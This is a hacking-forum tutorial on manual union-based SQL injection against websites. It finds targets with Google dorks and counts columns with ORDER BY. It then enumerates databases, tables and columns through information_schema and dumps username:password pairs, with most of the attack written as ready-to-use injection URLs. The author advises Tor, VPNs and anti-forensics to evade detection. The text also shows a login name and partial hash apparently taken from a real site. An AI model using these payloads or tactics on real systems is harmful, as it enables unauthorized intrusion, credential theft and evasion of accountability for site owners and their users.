[tut] Union SQL Injection and string injection (forcing an error)

Union SQL Injection and string injection (forcing an error)

This tutorial is for educational purposes only! Any misuse of my tutorials is at own risk!

Hello, Evilzone. This is my tutorial on Union SQL Injection and string injection (forcing an error). There are 2 methods in this tutorial. Union based injection and union based string injection.There is only a small difference and will be explained later in this tutorial.

Items we need and stuff we need to complete in this tutorial.
Before you start at anything please install tor browser or get a vpn or use both. If you could even learn anti forensics. For your own ass.

Items we need:

Quote
1.  A text editor of choice. (Using a pen and paper would take to long).
2.  This is manual injection we want a good browser and helping tools. (FIREFOX) for hackbar.
3.  A vulnerable site.
4.  Some fresh Coke and chips. (some spare time)

Things we would learn:

Quote
1.  Understanding what SQL injection is.
2.  Finding vulnerable websites (or finding vulnerabilities on one site.)
3.  Gathering database information.
4.  Learn to know and understand all Attack vectors i use.
5.  Vectors to drop information fast and multiple information out of one column.
6.  Using hex to make it all readable to add your name and more.
8.  Finding admin login pages.

Let the journey to SQL Injection begin!

If you run Firefox, install the hackbar. That will ease your life in SQL injection and XSS for sure!
https://addons.mozilla.org/en-US/firefox/addon/hackbar/

If you don't use Firefox yet, here is the download page: http://www.mozilla.org/en-US/firefox/new/
If you do not want to use firefox it is fine whit me i am only suggesting easy to use tools.

1. Union SQL Injection.

What is SQL Injection? Well SQL Injection is an attack performed on websites who run MySQL or SQL Databases. There are many kinds of SQL Databases.
So SQL is a wide subject to cover. SQL Injection is literally injecting SQL statements in vulnerable entry points to the database. For example user inputs and URL's, i will explain how to check if these are vulnerable later in the tutorial.
In this tutorial i will explain Union injection(this is basic) What is union select? union select is an SQL Statement that joins 2 query's. Ours and the web applications query. Because of that we can select Query's from the database and make it respond to our query.
In this tutorial i will only explain how to do SQL Injection in urls.

2. Finding vulnerable websites (or finding vulnerabilities on one site.)

Checking if a link is vulnerable is actually easy. Its mostly finding the vulnerable one that is the problem. 

First off all we need to find a vulnerable website We have to look for an url that takes input or has an id to it. Something like this should be in the end:
.php?id=1 it could also be a whole load of other things .asp?id= or php?id=AWORD and so on. Lets stick to the .php?id=... Because asp most of the times uses MsSql database.
You cant use union on those. Now how to easely find vulnerables? There are scanners on the market even free ones. Even though i like google more.
Ill explain how to do it whit google and google dorks.

Its quite simple and you can use google dorks to find about anything indexed in google you will be happy you learned how to use them.

How do google dorks work?
In most cases we will use the inurl:"" dork. Whit this dork we can find most of the stuff we need.
Of course there are other use full dorks:

google dorks:

Code: [Select]
intitle, intext, inurl, filetype, site, allinurl there are more but these are the use full ones for us.  Interested in more look for google power commands. Google's a hackers friend if you want to know shit use it!

Now how to use dorks, i'm gonna explain 3 of the dorks the most use full ones for SQL Injection. One inurl: , two intext: and three site:

If you use inurl".php?id=" google will show you only sites whit that in the url. Making finding vulnerables easy.
But of course we want to target sites rather then attacking random sites. How do we do that?

site:"www.site.com" inurl:"php?id=" now you will get all results for site.com whit php?id= in the url.


Testing vulnerability:

Code: [Select]
http://www.[site].com/page.php?id=1
http://www.[site].com/page.php?id=1'  [look at the ' single quote.]


Code: [Select]
http://imageshack.us/a/img692/8929/vulntestm.png
If a MySQL error occurs, then it most likely is vulnerable to SQL Injection. There are other kinds of SQL errors, MsSQL errors, MsAcces errors. Microsoft JET errors.
I will be covering the methods to inject those later. Also pages that move content or turn blank are possible injectable (but Lets first start with the basics shall we.)

Example of a MySQL error:

Code: [Select]
You have an error in your SQL syntax;
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
You can also see an error like that in the image where we test vulnerability.

3. Gathering database information..

3Te column count:

We need to get the column count in order to successfully SQL inject our target. We can do this by using the order by method. It is actually very simple, you start with trying order by 1-- the web page should now load fine. So keep increasing that number 1 until you get an error.
For example if you hit order by 20 and you get an error. It means you have to go down. If you hit 15 and it said no error it means you have to go up. Now keep increasing by one until you get that error.

Example of ORDER BY:

Code: [Select]
http://www.[site].com/page.php?id=1+order+by+1-- [no error]
http://www.[site].com/page.php?id=1+order+by+100-- [no error]

Oops i had no error on 100? Thats intentionally i have to explain what string injection is.

Code: [Select]
http://imageshack.us/a/img89/4534/order1.png
http://imageshack.us/a/img28/9065/order100.png

Why do i do order by 100? This way we can determine if we need to use string injection.
If you do not get an error when you use order+by+100-- We would need to force an error.

How do we do this:

Code: [Select]
http://www.[site].com/page.php?id=1'+order+by+100--+-I added a singe quote behind the id number and +- at the end of the line edit the spaces whit +. Executing our input as a string we should trigger an error above the columns we need.
Mine isnt really string injection this was just to show you. i removed the tic.

Code: [Select]
http://www.[site].com/page.php?id=1+order+by+1-- [no error]
http://www.[site].com/page.php?id=1+order+by+100-- [error]
http://www.[site].com/page.php?id=1+order+by+10-- no error]
http://www.[site].com/page.php?id=1+order+by+15-- [no error]
http://www.[site].com/page.php?id=1+order+by+16-- [no error]
http://www.[site].com/page.php?id=1+order+by+17-- [error]


Code: [Select]
http://imageshack.us/a/img692/3384/columcount.png
At this point we know one important thing, this web page has 16 columns. Because we had an error saying Unknown column '17' in 'order clause'.
When we executed order+by+16-- we had no error. So the last page whitout an error is the actual column count. Which we are about to need in our next step.

Union Select statement.

Union select is a basic SQL injection method. Also the most common. Union joins 2 query's as explained before. The ID or whatever from the site we try to inject.
And ours, our query's we use to inject the web-page. You will be hearing a lot about query's when you start learning SQL Injection.

The union statement:

Code: [Select]
http://www.[site].com/page.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

For string injecting: http://www.[site].com/page.php?id=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-


Code: [Select]
http://imageshack.us/a/img341/9457/unionselect.png
Now look at the content of the site even at the source if you don't see any random numbers popping up.
If it does that are the returned vulnerable columns in our web page. The ones we need to inject our query's in.

If nothing happens it is because we have to ad a - before the id number. This is what we call a negative id. If - wont work try null or 0.
Those might work instead. You can also use null in the union statement. Ill explain the use of this in another tutorial.

As following:
index.php?id=-1

For me a whole load of numbers returned. This makes it easy for me because i can inject more then one statement at a time. We now need to get the version of the SQL database the server is running. If its 5 or higher its easy. If its 4 or below its a long work around. I will be explaining version 4 and less in one of my next tutorials.

Let's ask for version() on our first vulnerable column which was 2.

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16--
That was one way of finding the version. In some cases it might be blocked or wont work. You can try this statement as well.

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16--
Now where the number previously popped up there the version we requested will show its tails.
We always want it to be 5.x.x or more!

Lets say mine is: 5.5.25-log We also need a lot more things. Because i have so many vulnerable columns i will show the image below with database.
If you have more then one column you can make more then one thing show up at a time. You can even inject hex. And inside the hex HTML if you would prefer to.
For example inputting a name or an image. How to do this. Simple replace the vulnerable column with 0x(HEX CODE)  where it said (hex code) you have to replace it with the text or HTML you want it to be: 0xuSploit and then change uSploit into hex: 7553706c6f6974 and put the 0x in front in order for the database to translate it. You can do this with the hackbar or swingnote website google that. Lets get the database name.

Select database name:

You can simply add your query at another vulnerable column or edit the one you are already using:

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,database(),15,16--Somethimes theres more then one database and another way to show version:
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,,4,5,6,7,8,9,10,@@version,12,13group_concat(database()),15,16--
Save the Database name in notepad for later in the tutorial you will need it.

If the querry for more then one db does not work, You can check this whit the following query.
You won't be needing this a lot though. Just in case.

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(schema_name),12,13,14,15,16+from+information_schema.schemata--

Code: [Select]
http://img29.imageshack.us/img29/3575/versiondbhex.png
My database is called "afa_db" no quotes. (as it pops up at where my vulnerable column shows. You can see this in my screeny.
Now lets get to some more sensitive data!


Gething more information out of one column

It is possible to use the group_concat statement to drag out many information at ones. Easing a hackers life a lot!
How would we be able to do that? 

Code: [Select]
group_concat(version(),0x0A,database(),0x0A,user(),0x7553706c6f6974)Lets wrap that code up a bit. I ask for the version then i use hex to create a space inbtween version() and database() and so on otherwise it would be hard to know what is what.
then at the end theres 0x 7553706c6f6974  the 0x is to let db know its hex and the code is my name in hex. So next to the query my name pops up looks epic!

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(version(),0x0A,database(),0x0A,user(),0x7553706c6f6974),12,13,14,15,16--
Selecting the table names.

Stay tuned it's getting more advanced here! As you are probably new to SQL Injection this will be hard the first time. I advice not to copy paste the Query's but to write them one by one.
That is and always will be the best teaching method.

Our query to get all the tables out of our database:

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16+from+information_schema.tables+where+table_schema=database()--

Code: [Select]
http://imageshack.us/a/img716/7397/tablesi.png
Wow, that’s a hell of a Query! Let's clear that out for you:
The group_concat is a statement that has a max length of 1024 characters so it will return 1024 characters max. We use this because there can be a hell load of tables and columns, this eases our work. 
So it tells us that group_concat selects table names from information_schema (which is database). Yes no more no less. Loads of words for a small task.

What if you think not all tables showed up?
As i said the group_concat statement has a max length of 1024 characters and if there are more tables or columns we need to get those 2 in some cases. If we want to find all tables you could do this manually using only concat() and adding a limit at the end of our query.

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()+limit+0,1--+-keep increasing that limit until you have all tables.
0,1 | 1,1 | 2,1 | 3,1 | 4,1 | 5,1 | 6,1 | 7,1 | 8,1 | 9,1 | 10,1 | 11,1 and so on.

Now we have all our tables, we should get the columns. But first we need to choose one of the tables we want our columns from. 
The list i can choose from: adverts,content,members,news,partners,users. Of course in my case there could have been 2 to choose from. I choose users above members and got it right. The admins always in user or admin table.

What to look for?
administrator(s), member(s)
User(s), admin(s)
tbladmin(s),tblmember(s)

Anything that relates to user logins admin logins you should have a look into.Of course some hackers would also look for email adresses and passwords shopping details in shopping sites or so on.
I choose the table users so lets move on to extracting the column names from our table.

Extracting the column names. 

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16+from+information_schema.columns+where+table_name="users"--+-

Code: [Select]
http://imageshack.us/a/img248/632/magictouchhex.png
Take a close look at the query it looks very similar to our previous one. You only need to change group_concat(table_name) to group_concat(column_name) and .tables to .columns.
At the end of the line change table_schema to table_name and database to "users" (where it said users you have to put the table you got before!).

If you get an error this is not a bad thing lets use some magic fingers to fix this. Let's encode it in HEX! It is because the URL does not accept "administrator" as valid. We can fix this using hex.
http://www.swingnote.com/tools/texttohex.php or go to encoding in your hackbar and click on HEX. Choose the first format.

Code: [Select]
http://imageshack.us/a/img248/3444/columns.png
Where the website says Hello to my little friend there i will paste users.
Below all the hex values will appear.

choose this one: 7573657273 (users)
Ad 0x before those numbers. That way the database knows its hex and can translate it.

How to ad it to a link. Where you now have table_name="users"--
At the end of your link. We need to change to this. table_name=0x7573657273--

Our entire Query would now be:

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16+from+information_schema.columns+where+table_name=0x7573657273--
Now all the column names should have shown up where your vulnerable column is. Mine are as you can see in my screenshot: name,uname,passwd,content.

Look for username and password or whatever relates. I have a uname and passwd inside my list of columns.
Ill use those as an example. This is the interesting part isn't it? Did i finally get your full attention?

We change group_concat(column_name) to group_concat(uname,0x3a,passwd) 0x3a in hex means colon in SQL statements we separate our user from the password whit that colon. whit this said those statements together will give user:pass user2:pass2. If we would not use it its a mess.

At the end of our query,  +from+afa_db.users
The afa_db is the database name we had to look up at start. The users is the table name we searched at the second part of this tutorial. Which we also used to select our columns from.

Our next query:

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(uname,0x3a,passwd),12,13,14,15,16+from+afa_db.users--This time we do not need a hex for table users. Database will accept our input like that.
Code: [Select]
http://imageshack.us/a/img26/3787/nameandpassmd5.png
I won't be explaining on how to crack passwords. This is purely for educational purposes not for causing harm.
If anything went good? You should now have the name and password. Of course that was only basic union and string SQL injection.
There is a lot more to it you will see loads of that in upcoming tutorials. Mine are:

Login: franchiseuk
Password: cb65... <- its a real hash look in the picture.

To find admin login pages use http://y-shahinzadeh.ir/af/ this site scans for many know admin page names. Or try to connect to the ftp.
Do not forget to use tor or vpn or together to do so.

Thanks for reading! Hope you enjoyed my tutorial.